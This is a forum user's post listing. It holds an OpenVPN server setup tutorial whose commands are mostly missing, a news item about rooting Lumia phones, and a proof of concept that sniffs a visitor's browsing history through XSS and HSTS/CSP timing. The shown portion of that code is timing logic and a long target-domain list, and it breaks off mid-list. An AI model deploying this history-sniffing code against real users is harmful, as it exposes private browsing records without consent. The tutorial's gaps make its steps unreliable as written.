Nytro

Administrators
Everything posted by Nytro

  1. About OpenVPN:

If you're looking for a way to safely and easily access the internet from your smartphone, laptop or any other device on an untrusted network, like a hotel's or a restaurant's wifi, the answer is a virtual private network (VPN), which gives you the ability to roam untrusted networks quite securely and privately, as if you were on a private and secure network. The traffic then comes out and makes its way to the required destination. Combining this setup with HTTPS connections lets you secure your wireless logins and the transactions that you make. One can also jump past geographical restrictions and censorship, and shield one's location and unencrypted HTTP traffic from the untrusted network.

OpenVPN is an open source, fully featured SSL (Secure Socket Layer) VPN answer that covers a vast range of configurations. This article will explain how to set up an OpenVPN server on a Droplet and then access it from a different operating system like Windows, OS X, iOS or Android. The article will keep the configuration and installation process as simple as it can be for these setups.

Prerequisites:

The only thing that you need beforehand is an Ubuntu 14.04 Droplet up and running. You will need root access to complete the rest of the article.

Step 1 (Install and Configure the Environment of the OpenVPN Server)

To set up the server side for your OpenVPN you need to complete the following steps.

OpenVPN Configuration

We need to update Ubuntu's repository lists before we install any packages. After doing so we can install Easy-RSA and OpenVPN. The sample VPN server configuration file must be extracted to /etc/openvpn so that we can add it to our setup. A single command can be used to do this:

gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz > /etc/openvpn/server.conf

Once this has been extracted we must open server.conf in a text editor.
We will edit this using Vim, but you can use whichever text editor you want. There are a number of changes to be made. You will see a section like this:

Edit dh1024.pem to dh2048.pem. Doing this will double the RSA key length used when generating server and client keys.

Stay inside server.conf and look for this section. Remove the comment from push "redirect-gateway def1 bypass-dhcp". By doing this, the VPN server passes the clients' web traffic on to its required destination.

The next edit to be done here: remove the comments so that the last two lines of the above section look like this:

This will tell the server to push OpenDNS to the connected clients for DNS resolution wherever possible. This helps prevent the leakage of DNS requests outside the VPN connection. It is also necessary to set the desired DNS resolvers on the client devices too. Although OpenDNS is used by OpenVPN by default, you can use whichever DNS services you like.

The last area to edit in server.conf is: remove the comments from the last two lines of the section above so they look as such:

OpenVPN runs as the root user by default and in turn has full access to the system. We will restrict OpenVPN to just the user nobody and group nogroup. This user has no ability to log in and is simply an unprivileged user. This user is also typically used to run untrusted applications like web-facing servers.

Changes must be saved and Vim must be closed now.

Packet forwarding

This is a sysctl setting, and what it does is tell the server's kernel to send the traffic from the client devices out through the internet. If this is not done, the traffic will stop at the server. Packet forwarding should be enabled at runtime with this command:

This should be made permanent so that the server still forwards traffic after the system reboots. At the top of the sysctl file, there will be:

Uncomment net.ipv4.ip_forward.
It should look like:

Save the changes you have made and then exit.

Uncomplicated Firewall (ufw)

It's a front end for iptables and setting it up is quite easy. It's already present in Ubuntu 14.04 by default, so all we have to do is configure some settings and rules and switch the firewall on. First set ufw to allow SSH. In the command prompt, enter:

This article will use OpenVPN over UDP, so ufw must be set to allow UDP traffic over port 1194. Now we have to set ufw's forwarding policy. We'll edit ufw's primary config file for this. Look for DEFAULT_FORWARD_POLICY="DROP" and change it to DEFAULT_FORWARD_POLICY="ACCEPT". After doing this we will add some more rules for network address translation and masquerading the IPs of connected clients. Now make the top of the before.rules file look like it does below. The area in red for OPENVPN RULES will be added next:

After the changes have been made, we can enable it. Go to the command prompt:

Doing so will return this prompt:

Answer y. The result will then be:

Now we'll check ufw's firewall status:

Entering this command should return something like this:

Step 2 – Creating a Certificate Authority and Server-Side Certificate and Key

Certificates are used by OpenVPN to encrypt files.

Configuring and Building the Certificate Authority

Now it's time to generate our own Certificate Authority (CA) and generate certificates and keys for the OpenVPN server. Bidirectional authentication based on certificates is supported by OpenVPN, which means that the client and the server must authenticate each other's certificate before trust is mutually established between them. To do this we will use the Easy-RSA scripts that we copied earlier. First we copy the Easy-RSA generation scripts. Then the key storage directory should be made:

There is a variables file that can be edited to create certificates exclusive to our business, person or whatever entity we choose.
This information will be copied to the keys and the certificates, later helping in identifying keys. The variables marked below in red should be changed to what you prefer.

In the very same vars file we also need to edit this single line below. Just for the sake of simplicity we are using server as the key name. If you intend to use a different name then you're going to need to update the OpenVPN configuration files that reference server.key and server.crt.

Now we need to generate the Diffie-Hellman parameters, which will take several minutes.

Now we'll be changing directories so that we can work directly out of where we moved the Easy-RSA scripts to in STEP 2. Now we'll be initializing the Public Key Infrastructure. Special attention needs to be paid to the dot (.) and the space in front of the ./vars command. This tells the current directory where we're working. The output generated from the above command is shown below. Nothing has yet been generated by us in the keys directory, so the warning is nothing to get alarmed about.

Now we'll make way for our new keys by clearing out all the old or possibly existing keys that may be in the directory:

This last command invokes an interactive OpenSSL command and builds the certificate authority (CA). The output will ask you to confirm the variables that were entered before into the Easy-RSA variable file. Just press ENTER to pass through every prompt. If you feel like something should be changed then you can do that from within the prompt.

Generate a Certificate and Key for the Server

We're still working from /etc/openvpn/easy-rsa; now enter the command to build the key for the server. The server marked in red is the export KEY_NAME variable that we set in Easy-RSA's vars file in STEP 2. The same output is generated as when we ran the ./build-ca command; you can press ENTER again to confirm every line of the distinguished name.
This time, however, you'll see two additional prompts:

Both should be left blank; just press ENTER to skip each one. Two queries at the end require a positive (y) response:

Lastly, the above prompt should complete with:

Move the Server Certificate and Keys

OpenVPN is set by default to look for the certificate, keys and the server's CA in /etc/openvpn. Now we need to copy the required files into the proper location so that OpenVPN can easily access them for further usage. If your copy was successful, you can verify it by:

Now you should see the certificate and key files for the server in the desired location. At this stage, OpenVPN is up and ready to go. You should now start it and check the status. The output that you should see in return would be like this:

Congratulations! You have successfully configured your OpenVPN server and it should be operational. If for some reason the status message says that the VPN is not running then you should take a closer look at your /var/log/syslog file for any bugs or errors such as:

The error mentioned above indicates that server.key was not yet copied into /etc/openvpn correctly. You need to copy the file to the directory again and follow the procedure to try again and bring your OpenVPN to its operational state.

Step 3 – Generate Certificates and Keys for Clients

Up till now we have installed and configured the OpenVPN server. We created a Certificate Authority and created a certificate and keys just for the server. This step tells us how we use the server's CA to make certificates and keys for every client device that is going to be connected to the VPN. All of these files will then be installed on the client devices such as smartphones or laptops later on.

Key and Certificate Building

Ideally it's required that each client connecting to the VPN have its own certificate and key. This is preferred to generating a general certificate and key for all the clients connected to the VPN.
It should be noted that OpenVPN by default does not allow simultaneous connections to the server from clients using the same certificate and key. This step should be completed if you intend to create separate authentication credentials for each device that is to be connected to the VPN. Change the name client1 below to something different like client2 or iphone2. If we give every device its own separate credentials then it can be individually deactivated on the server side when needed. The rest of the article shall use client1 as the example client device's name.

Now we're going to build a key for client1 as we did for the server. The working directory that you should be in is /etc/openvpn/easy-rsa. As in the case of the server, you'll be asked again to confirm or change the distinguished name variables, and just like before these two should be left blank. Press ENTER to accept the default settings. Just like before, these two confirmations will need a (y) response at the end of the build process:

If the key build succeeds then the output, just like before, will be:

The example client configuration needs to be copied to the Easy-RSA key directory. This example configuration file shall be used as a template that will be downloaded to the client devices and then edited. While copying we'll be changing the name of the example file from client.conf to client.ovpn because .ovpn is the extension that all the clients will expect to use.

cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn/easy-rsa/keys/client.ovpn

This section can be repeated for each client by replacing client1 with the right client name.

Transferring Certificates and Keys to Client Devices

Remember from the steps above that we created the keys and certificates, and the directory in which we stored them after they were made was /etc/openvpn/easy-rsa/keys.
For every connected client we must transfer the client profile template, certificate and key files to a folder either on our local computer or on another client device. In this article the client1 device requires its keys and certificate that are located on the server in:

The ca.crt and client.ovpn for all the clients stay exactly the same. These two files should also be downloaded. It should be noted that the ca.crt file is located in a different directory than the others.

The application that is used to complete this transfer will depend solely on your choice and on the operating system of the device. You want the application to use SFTP (SSH file transfer protocol) or SCP (Secure copy protocol) on the backend. This is useful as it will copy all the client's VPN authentication files over an encrypted connection. At the end you must check that the following four files are present on your client device:

client1.crt
client1.key
client.ovpn
ca.crt

Step 4 – Creating a Unified OpenVPN Profile for Client Devices

There are a number of methods that can be used to manage the client files but the easiest one is using a unified profile. This is done by editing the client.ovpn template file and including in it the server's CA and the client's key and certificate. Once all the files are merged into one, only this single client.ovpn needs to be imported into the client's OpenVPN application.

What we will do is create a single profile for our client1 device on the computer to which we downloaded all the client files. This computer can itself be either a client or just another temporary work area to merge the authentication files. The client.ovpn template file should be duplicated and renamed. How you do this depends on the operating system of your local computer. It should be noted that the name of the duplicated client.ovpn file need not be related to the client device.
The OpenVPN application on the client side will use the file name as an identifier for the VPN connection itself. What you should do is duplicate client.ovpn to whatever name you want the VPN to have in your operating system. In this article we shall name the connection GeekEasier, so GeekEasier.ovpn shall be the file name used from now on.

Once it is named, we must open GeekEasier.ovpn in a text editor. You can use whichever text editor you prefer. The first area which you need to pay attention to is the IP address of your Droplet. Near the top of the file, we need to change my-server-1 to your VPN's IP. After doing this we need to find the area shown below and then uncomment user nobody and group nogroup just like we did before in server.conf in STEP 1. It should be noted that this does not apply to the Windows operating system, so Windows users can skip it. It should look like below:

The area below needs the three lines shown to be commented out so that we can instead include the key and certificate directly in the GeekEasier.ovpn file. After you're done it should look like this:

Now we need to merge all the individual files into one single unified file. The contents of ca.crt, client1.crt, and client1.key are pasted directly into the .ovpn profile using XML-like syntax. The XML at the end should take this form:

Once finished, the end of the file should be the same as this abbreviated example:

The client1.crt has a bit of extra information in it and it's totally fine to just add the whole file. Save the changes that you have made and exit. We now have a unified OpenVPN client profile to configure our client1 with.

Step 5 – Installing the Client Profile

What needs to be discussed now is how to install a client VPN profile on Android, iOS, OS X, and Windows. All of these client instructions are independent of one another, so you can skip to whichever one applies to you.
It should be remembered that the connection will be called by the same name that you gave the .ovpn file. In our example, since the file name was GeekEasier.ovpn, the connection will be called GeekEasier.

Windows

Installing

The OpenVPN client application for Windows can be downloaded from OpenVPN's Downloads page. You have to choose the right version from the website for your version of Windows. It should be noted that administrative rights are required to install OpenVPN on Windows. After you have installed OpenVPN, copy the unified GeekEasier.ovpn profile to:

When you open OpenVPN it will automatically see the profile and make it available. OpenVPN requires that it be run as an administrator each time it is used, even by administrative accounts. To save the hassle of having to right-click and select Run as administrator every time you use the VPN, you can preset this, but the condition is that it must be done from an administrator account. This means that standard users need to enter the admin password to use OpenVPN. But if standard users do not have administrative rights then OpenVPN cannot connect to the server properly, thus administrative privileges are quite necessary.

To set the OpenVPN application to always run as the administrator, right-click on the shortcut icon and go to Properties. At the bottom of the Compatibility tab there will be a button saying Change settings for all users; click on it. A new window will open; check the Run this program as an administrator box.

Connecting

Every time that you launch the OpenVPN GUI, Windows will ask you whether you want this program to make changes to your computer. Click Yes. Executing the OpenVPN client application just puts the applet in the system tray so that the VPN can be connected and disconnected when needed, but it does not make a VPN connection per se.
Now that you have started OpenVPN, make a connection by moving the cursor down to the system tray applet and then right-clicking on the OpenVPN applet icon present there. Doing so will open the context menu. Select GeekEasier from the top of the menu, which is basically our GeekEasier.ovpn profile, and Connect to it.

OS X

Installing

There is an open source VPN client for Mac OS X known as Tunnelblick. To download the latest disk image of this client just go to the Tunnelblick Downloads page. After it has been downloaded, double-click on the .dmg file and follow the steps to install. Near the end of the installation process, Tunnelblick will ask you whether you have any configuration files. Answering No is easier, and then it will finish. We have to add the client profiles, and to do that we must open a Finder window and then double-click on GeekEasier.ovpn. To install the client profile we need administrative rights.

Connecting

Launch Tunnelblick by double-clicking on Tunnelblick in the Applications folder. Once you have launched Tunnelblick, you will be able to see a Tunnelblick icon in the menu bar at the top right of the screen that is used for controlling connections. Click on the icon; when the Connect menu opens you need to select the right connection. Select GeekEasier and connect to the VPN.

iOS

Installing

We need to go to the iTunes App Store and search for and install OpenVPN Connect, the official iOS OpenVPN client application. Now we need to transfer our iOS client profile onto the device, and to do that we must connect the iOS device directly to the computer. Completing the transfer will be outlined here. From the computer, open iTunes and click iPhone > Apps. At the bottom of the File Sharing section, click on the OpenVPN app. The window to the right is blank; it is OpenVPN Documents and is used for sharing files. Now drag the .ovpn file to the OpenVPN Documents window. Now all you have to do is launch the app on the iPhone.
You will get a notification that a new profile is ready to be imported. Tap the green plus sign to import it.

Connecting

Now the OpenVPN app is ready to use with the new profile. The connection can be started by sliding the Connect button to the On position. If you want to disconnect then slide the button to the Off position. It should be noted that the VPN button in Settings can never be used to connect to the VPN. If you try to do so, you will get a notice to connect from the OpenVPN app.

Android

Installing

For Android, all we need to do is open the Google Play Store. Search for Android OpenVPN and install the official Android client application. Copying the .ovpn file is not that hard. All we need to do is connect our Android device to the computer and then copy the file over to it. Similarly, if you have an SD card reader, you can simply remove the memory card from the device, copy the .ovpn file onto it and then put the card back into the device. Now start the OpenVPN application and go to the menu to import the profile. Then go to the location where the profile has been saved. The screenshot uses the SD card location (/sdcard/download/); from there select the file. The application will note that the profile has been imported.

Connecting

To connect to the VPN, just tap the Connect button. The application will prompt to ask whether you trust the OpenVPN application. Tap OK to start the connection. If you want to disconnect from the VPN, just go back to the OpenVPN application and choose Disconnect.

Step 6 – Testing Your VPN Connection

Once you have installed everything, a simple check can be made to tell whether everything is working properly. Without enabling a VPN connection, open a browser and go to DNSLeakTest. The website will show you the IP address that is assigned to you by your ISP (Internet Service Provider), which is also how you appear to the entire world.
If you want to check your DNS settings from the same website, click on Extended Test and it will tell you which DNS server is being used by you. Now connect the OpenVPN client to the Droplet's VPN and then refresh your browser. Now an IP address should appear that is completely different from the one shown earlier. Now the entire world will recognize you by this IP address. Again, DNSLeakTest's Extended Test will check your DNS settings and confirm that you are now using the DNS resolvers pushed by your VPN.

Congratulations! You can now securely traverse the internet, protecting your cyber identity, location and traffic from censors and snoopers.

Source: http://geekeasier.com/set-up-an-openvpn-server-on-ubuntu/3584/
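The Step 1 edits to server.conf (dh2048.pem, pushing the default gateway and OpenDNS resolvers, dropping to nobody/nogroup) and the sysctl change are easy to get half-done by hand, so here is an added example, not code from the article above or from the OpenVPN project, that applies those edits to config text and then checks the result the way a reviewer would. The config excerpts are constructed from the stock OpenVPN 2.3 sample files; the function names are my own.

```python
import re

# Constructed excerpt of the sample server.conf that ships with OpenVPN 2.3 on
# Ubuntu 14.04 (only the directives the walkthrough touches are shown).
SAMPLE_SERVER_CONF = """\
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
server 10.8.0.0 255.255.255.0
;push "redirect-gateway def1 bypass-dhcp"
;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"
keepalive 10 120
;user nobody
;group nogroup
persist-key
persist-tun
"""

# Constructed excerpt of /etc/sysctl.conf with forwarding still commented out.
SAMPLE_SYSCTL_CONF = """\
# Uncomment the next line to enable packet forwarding for IPv4
#net.ipv4.ip_forward=1
"""

# Directives the walkthrough uncomments (';' is OpenVPN's comment marker).
UNCOMMENT = [
    'push "redirect-gateway def1 bypass-dhcp"',
    'push "dhcp-option DNS 208.67.222.222"',
    'push "dhcp-option DNS 208.67.220.220"',
    "user nobody",
    "group nogroup",
]


def harden_server_conf(text):
    """Apply the Step 1 edits to server.conf text and return the new text."""
    out = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "dh dh1024.pem":
            line = "dh dh2048.pem"            # 2048-bit DH parameters
        elif stripped.startswith(";") and stripped[1:].strip() in UNCOMMENT:
            line = stripped[1:].strip()       # drop the leading ';'
        out.append(line)
    return "\n".join(out) + "\n"


def active_directives(text):
    """Set of non-blank, non-comment lines (';' for OpenVPN, '#' for sysctl)."""
    return {ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.strip().startswith((";", "#"))}


def check_server_conf(text):
    """Return a list of findings; an empty list means Step 1 is complete."""
    active = active_directives(text)
    findings = []
    if "dh dh1024.pem" in active:
        findings.append("dh still points at dh1024.pem")
    for directive in UNCOMMENT:
        if directive not in active:
            findings.append("missing: " + directive)
    return findings


def enable_ip_forward(sysctl_text):
    """Uncomment net.ipv4.ip_forward=1 in sysctl.conf text, adding it if absent."""
    pattern = re.compile(r"^\s*#?\s*net\.ipv4\.ip_forward\s*=\s*\d+\s*$")
    out, seen = [], False
    for line in sysctl_text.splitlines():
        if pattern.match(line):
            line, seen = "net.ipv4.ip_forward=1", True
        out.append(line)
    if not seen:
        out.append("net.ipv4.ip_forward=1")
    return "\n".join(out) + "\n"


def ip_forward_enabled(sysctl_text):
    """True when forwarding is set persistently (not just via sysctl -w)."""
    return "net.ipv4.ip_forward=1" in active_directives(sysctl_text)


if __name__ == "__main__":
    print(check_server_conf(SAMPLE_SERVER_CONF))                        # six findings
    print(check_server_conf(harden_server_conf(SAMPLE_SERVER_CONF)))    # []
    print(ip_forward_enabled(enable_ip_forward(SAMPLE_SYSCTL_CONF)))    # True
```

Running check_server_conf against the live /etc/openvpn/server.conf after editing is a cheap way to confirm that the DNS push lines were actually uncommented, which is the edit most often missed and the one that leaves DNS requests leaking outside the tunnel.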
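Step 4 (building the unified .ovpn profile) is the other place where a manual slip leaves a client that will not connect: a forgotten remote line, a file reference left active, or the textual dump at the top of client1.crt pasted inside the inline block. The following added example, which is not code from the article above or from the OpenVPN project, does the merge the article describes and verifies the result. The template is a constructed excerpt of the sample client.conf, the PEM bodies are placeholders rather than real keys, and the function names and the windows flag are my own.

```python
import re

# One PEM block: header line, body, footer line (DOTALL so body may span lines).
PEM_BLOCK = re.compile(
    r"-----BEGIN [A-Z ]+-----\r?\n.*?\r?\n-----END [A-Z ]+-----", re.S)

# Constructed excerpt of the sample client.conf copied to client.ovpn.
SAMPLE_TEMPLATE = """\
client
dev tun
proto udp
remote my-server-1 1194
resolv-retry infinite
nobind
;user nobody
;group nogroup
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
comp-lzo
verb 3
"""

# Constructed placeholder PEM bodies; not real certificates or keys.
CA_CRT = "-----BEGIN CERTIFICATE-----\nPLACEHOLDER_CA\n-----END CERTIFICATE-----\n"
# client1.crt as Easy-RSA writes it: a human-readable dump precedes the PEM block.
CLIENT_CRT = ("Certificate:\n    Data:\n        Version: 3 (0x2)\n"
              "-----BEGIN CERTIFICATE-----\nPLACEHOLDER_CLIENT1\n"
              "-----END CERTIFICATE-----\n")
CLIENT_KEY = "-----BEGIN PRIVATE KEY-----\nPLACEHOLDER_KEY\n-----END PRIVATE KEY-----\n"


def extract_pem(text):
    """Return the first PEM block in text, dropping any textual dump before it."""
    m = PEM_BLOCK.search(text)
    if m is None:
        raise ValueError("no PEM block found")
    return m.group(0)


def build_unified_profile(template, server_ip, ca_crt, client_crt, client_key,
                          windows=False):
    """Merge CA, client cert and key into the template the way Step 4 describes."""
    lines = []
    for line in template.splitlines():
        s = line.strip()
        if s.startswith("remote "):
            parts = s.split()
            parts[1] = server_ip             # my-server-1 -> the Droplet's IP
            line = " ".join(parts)
        elif s in (";user nobody", ";group nogroup") and not windows:
            line = s[1:]                     # privilege drop; skipped on Windows
        elif s.startswith(("ca ", "cert ", "key ")):
            line = "#" + s                   # the files are inlined below instead
        lines.append(line)
    for tag, pem in (("ca", ca_crt), ("cert", client_crt), ("key", client_key)):
        lines += ["<%s>" % tag, extract_pem(pem), "</%s>" % tag]
    return "\n".join(lines) + "\n"


def verify_profile(profile, server_ip):
    """Return findings; an empty list means the profile is self-contained."""
    findings = []
    active = [ln.strip() for ln in profile.splitlines()
              if ln.strip() and not ln.strip().startswith((";", "#"))]
    if ("remote %s 1194" % server_ip) not in active:
        findings.append("remote line does not point at the server")
    for ref in ("ca ", "cert ", "key "):
        if any(a.startswith(ref) for a in active):
            findings.append("file reference still present: " + ref.strip())
    for tag in ("ca", "cert", "key"):
        m = re.search(r"<%s>\n(.*?)\n</%s>" % (tag, tag), profile, re.S)
        if m is None or len(PEM_BLOCK.findall(m.group(1))) != 1:
            findings.append("<%s> block missing or not exactly one PEM" % tag)
    return findings


if __name__ == "__main__":
    profile = build_unified_profile(SAMPLE_TEMPLATE, "203.0.113.10",
                                    CA_CRT, CLIENT_CRT, CLIENT_KEY)
    print(profile)
    print(verify_profile(profile, "203.0.113.10"))   # []
```

The verifier deliberately treats a left-over active "ca ca.crt" line as a finding: OpenVPN would then look for a file next to the profile instead of using the inline block, which is exactly the failure a user sees when the template was copied but not edited.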
  2. Thanks. Yes, it is extensive. Such things are not sold, bought or given away for free.
  3. Windows Phone Internals 1.0 - the first toolkit for rooting Lumia phones

Aurelian Mihai - 26 Nov 2015

Through the efforts of a hacker who is very active in the XDA Developers community, users of Lumia phones running Windows Phone will now be able to customize their installed OS version just like Android users. With Windows Phone Internals 1.0 you can unlock the default bootloader on Lumia phones and apply the root procedure, gaining access to the innards of the operating system and even the ability to install unofficial Windows Phone ROMs, modifying or extending the device's base functionality.

According to the developer known by the pseudonym Heathcliff, the software already supports "the majority of Windows Phone 8.1 and Windows 10 Mobile versions". Of course, as with the similar procedure used to modify Android devices, the changes made by users can lead to the loss of the manufacturer's warranty if those changes end up breaking the device.

For the moment the usefulness of the Windows Phone Internals kit is limited, as there are no custom Windows Phone ROMs available to install yet. But that will surely change once the members of the XDA community get to experiment with the new software.

Source: Windows Phone Internals 1.0 - the first toolkit for rooting Lumia phones

I like the articles from go4it.
  4. Not sure if this has been posted before: https://crowdshield.com/bug-bounty-list.php
  5. Remotely Sniffing Browser History via XSS Using HSTS + CSP

This is a PoC/demo of how to remotely "sniff" a user's browsing history via Cross-Site Scripting (XSS) vulnerabilities using HSTS/CSP timing attacks. All credits for the original exploit go to @bcrypt; it can be downloaded here: https://github.com/diracdeltas/sniffly. The source code below allows for remote exploitation of clients and remote dumping of positive matches back to a specified web browser.

Source code:

/**
 * @fileoverview This file loads a bunch of HSTS domains and times how long it
 * takes for them to be redirected from HTTP to HTTPS. Based on that, it
 * decides whether the domain is a previously-noted HSTS domain or not.
 * @author yan <yan@mit.edu>
 * @license MIT
 * @version 0.2.0
 */

// Timing in milliseconds above which a network request probably occurred.
// TODO: Determine this dynamically from the distribution of response times.
var TIMING_UPPER_THRESHOLD = 5;
// Timing in milliseconds below which a request time is probably a measurement
// fluke.
var TIMING_LOWER_THRESHOLD = -10;
// Timing allowance for a synchronous image load, which we use to confirm
// positive results in Chrome.
var TIMING_CONFIRM_THRESHOLD = 20;
// Use an arbitrary static preloaded HSTS host for timing calibration
var BENCHMARK_HOST = 'http://torproject.org/';
// Initial timing calibration offset. This gets recalculated every other fetch.
var OFFSET = 0;

var visitedElem = document.getElementById('visited');
var notVisitedElem = document.getElementById('not_visited');
var disclaimer = document.getElementById('disclaimer');
var isFirefox = (window.navigator.userAgent.indexOf('Firefox') !== -1);
var visited = []; // list of hosts that are potentially visited

// Edit this based on scraper results.
var hosts = ['http://www.npmjs.com/', 'http://savecrypto.org/', 'http://www.xoom.com/', 'http://atom.io/', 'http://angel.co/', 'http://vine.co/', 'http://www.oculus.com/en-us/', 'http://www.hackerrank.com/', 'http://noscript.net/', 'http://www.sixt.com/', 'http://www.crazydomains.com.au/', 'http://www.yola.com/', 'http://www.mailerlite.com/', 'http://giustizia.it/', 'http://notepad-plus-plus.org/', 'http://www.unfranchise.com.tw', 'http://www.ing-diba.de/', 'http://www.adreactor.com/', 'http://meduza.io/', 'http://www.wealthfront.com/', 'http://mail.live.com/default.aspx', 'http://muabannhanh.com/', 'http://upjers.com/', 'http://www.rabobank.nl/', 'http://www.ing.nl/', 'http://www.kickstarter.com/', 'http://creativemarket.com/', 'http://pinterest.com/', 'http://www.ashampoo.com/en/usd', 'http://www.sofort.com/', 'http://www.xing.com/', 'http://podio.com/', 'http://www.servis24.cz/', 'http://www.galeria-kaufhof.de/', 'http://www.kocpc.com.tw/', 'http://www.commbank.com.au/', 'http://recyclix.com/', 'http://www.usajobs.gov/', 'http://briian.com/', 'http://www.vultr.com/', 'http://about.gitlab.com/', 'http://www.tanga.com', 'http://wanelo.com/', 'http://herokuapp.com/', 'http://unsplash.com/', 'http://ria.com/', 'http://www.missguided.co.uk/', 'http://lever.co/', 'http://venmo.com/', 'http://ello.co/', 'http://www.template.net/', 'http://www.digid.nl/', 'http://qiwi.ru/', 'http://www.instacart.com/', 'http://www.touchofmodern.com/', 'http://roadtrippers.com/', 'http://www.freshdesignweb.com/', 'http://www.fnb.co.za', 'http://www.graphicsprings.com/', 'http://www.patreon.com/', 'http://hotwords.com/', 'http://www.cryptsy.com/', 'http://vitalsource.com/', 'http://pass.yandex.ua/', 'http://www.yammer.com/', 'http://ixquick.com/', 'http://sbis.ru/', 'http://www.ecosia.org/', 'http://www.freecycle.org/', 'http://pass.yandex.by/', 'http://www.mailjet.com/', 'http://www.yugster.com/', 'http://tinypng.com/', 'http://nest.com/', 'http://kat.cr/', 'http://www.practo.com/', 
'http://c9.io/', 'http://beget.ru/', 'http://startpage.com/', 'http://www.bet-at-home.com/', 'http://tripcase.com/', 'http://www.douglas.de/', 'http://yande.re/post', 'http://www.bookbub.com/', 'http://www.swarmapp.com/', 'http://www.woorank.com/', 'http://paytm.com/', 'http://www.payza.com/', 'http://www.instapaper.com/', 'http://wikitech.wikimedia.org/', 'http://www.ipko.pl/', 'http://www.straighttalk.com/wps/portal/home', 'http://heroku.com/', 'http://www.privat24.ua', 'http://zimbra.free.fr/', 'http://www.blueapron.com/', 'http://secure.logmein.com/', 'http://adblockplus.org/', 'http://www.udemy.com/', 'http://tribalwars2.com/', 'http://sparkfun.com/', 'http://www.sparebank1.no/bank/', 'http://spotify.com/', 'http://creditkarma.com/', 'http://www.paxum.com/payment/phrame.php', 'http://jamberrynails.net/', 'http://fotolia.com/', 'http://stacksocial.com/', 'http://www.cms.gov/', 'http://iconfinder.com/', 'http://www.expireddomains.net/', 'http://navalny.com/', 'http://privatbank.ua/', 'http://www.englishforums.com/', 'http://www.hushmail.com/', 'http://www.pingdom.com/', 'http://www.zomato.com/', 'http://icook.tw/', 'http://www.office.com/', 'http://groupme.com/', 'http://wikimedia.org/', 'http://dapulse.com/', 'http://www.cuelinks.com/', 'http://www.attracta.com/', 'http://www.outlook.com/owa/', 'http://www.dnb.no/', 'http://www.lotterypost.com/', 'http://bitcoin.org/', 'http://href.li/', 'http://skandiabanken.no/', 'http://foursquare.com/', 'http://www.usa.gov/', 'http://www.bitgold.com/', 'http://quizlet.com/', 'http://www.alipay.com', 'http://yadi.sk/', 'http://duckduckgo.com/', 'http://www.dashlane.com/', 'http://www.ozbargain.com.au/', 'http://www.ricardo.ch/', 'http://www.fakku.net/', 'http://www.mturk.com/', 'http://www.national-lottery.co.uk/', 'http://www.onthebeach.co.uk/', 'http://www.icloud.com/', 'http://www.zenefits.com/', 'http://code.org/', 'http://www.chapters.indigo.ca/', 'http://www.dntx.com/', 'http://www.slsp.sk/', 'http://www.raise.com/', 
'http://cinematrix.net/', 'http://www.baifubao.com/', 'http://blogun.ru/', 'http://videostripe.com/', 'http://typekit.com/', 'http://www.splitwise.com/', 'http://www.eobot.com', 'http://login.microsoftonline.com/', 'http://www.xero.com/', 'http://www.rakuten-sec.co.jp/', 'http://www.creativecow.net/', 'http://sweb.ru/', 'http://www.seroundtable.com/', 'http://www.hipchat.com/', 'http://subscribe.free.fr/', 'http://topvisor.ru/', 'http://www.avforums.com/', 'http://www.travelodge.co.uk', 'http://opendns.com/', 'http://www.pcloud.com/', 'http://www.akiba-online.com/', 'http://www.instamojo.com/', 'http://www.commsec.com.au/', 'http://assembla.com/', 'http://www.bukalapak.com/', 'http://www.docusign.net/', 'http://www.hotslogs.com/', 'http://www.consorsbank.de/home', 'http://www.searchlock.com/', 'http://madmimi.com/', 'http://www.bawagpsk.com/BAWAGPSK/PK', 'http://www.crunchbase.com/', 'http://www.maketecheasier.com/', 'http://session.wikispaces.com/1/auth/auth', 'http://witkit.com/', 'http://pixabay.com/', 'http://www.mygreatlakes.org/', 'http://ncore.cc/', 'http://www.hpconnected.com/', 'http://payeer.com/', 'http://join.me/', 'http://www.gamefly.com/', 'http://bitcoinwisdom.com/', 'http://land.nrw/', 'http://www.saddahaq.com/', 'http://www.quantcast.com/', 'http://www.behance.net/', 'http://xapo.com/', 'http://fabric.io/', 'http://www.dollarphotoclub.com/', 'http://mandrillapp.com/', 'http://moodle.org/', 'http://imp.free.fr/', 'http://www.pebble.com/', 'http://www.periscope.tv/', 'http://generalassemb.ly/', 'http://login.szn.cz/', 'http://www.lyft.com/', 'http://www.mql5.com/', 'http://www.wrike.com/', 'http://www.fanfiction.net', 'http://www.box.com/', 'http://www.test.de/', 'http://calendar.sunrise.am', 'http://www.djangoproject.com/', 'http://qiwi.com/', 'http://adlure.net/', 'http://www.stitchfix.com/', 'http://www.bankofthewest.com/', 'http://roem.ru/', 'http://www.carthrottle.com/', 'http://pass.yandex.kz/', 'http://gumroad.com/', 
'http://www.hosteurope.de/', 'http://www.canva.com/', 'http://www.usbank.com/', 'http://evernote.com/', 'http://secure.actblue.com/', 'http://myspace.com/', 'http://www.jbhifi.com.au', 'http://www.physicsforums.com/', 'http://www.abnamro.nl/nl/index.html', 'http://twittercommunity.com/', 'http://wikileaks.org/', 'http://www.chmail.ir/', 'http://mail.ru', 'http://www.victoriassecret.com/', 'http://www.firstnational.com/', 'http://www.dominos.co.uk/', 'http://www.indiblogger.in/', 'http://www.zendesk.com/', 'http://www.hypovereinsbank.de/', 'http://www.openshift.com/', 'http://buffer.com/', 'http://what.cd/', 'http://hide.me/', 'http://trello.com/', 'http://www.comodo.com/', 'http://twilio.com/', 'http://www.alternate.de/', 'http://telegram.org/', 'http://www.manageengine.com/', 'http://unsw.edu.au/', 'http://www.flipkey.com/', 'http://www.popads.net/', 'http://myworkday.com/', 'http://www.meneame.net/', 'http://popcorntime.io/', 'http://iqoption.com/', 'http://www.tumblr.com/', 'http://www.reddit.com/', 'http://www.petfinder.com/', 'http://www.messenger.com/', 'http://www.digitalpoint.com/', 'http://www.blibli.com/', 'http://namu.wiki/', 'http://launchpad.net/', 'http://www.blognone.com/', 'http://www.ing.be/en/retail/Pages/index.aspx', 'http://acrobat.com/', 'http://mbank.pl/', 'http://www.fasttech.com/', 'http://www.post.ch/de', 'http://gyazo.com/', 'http://packagecontrol.io/', 'http://vimeo.com/', 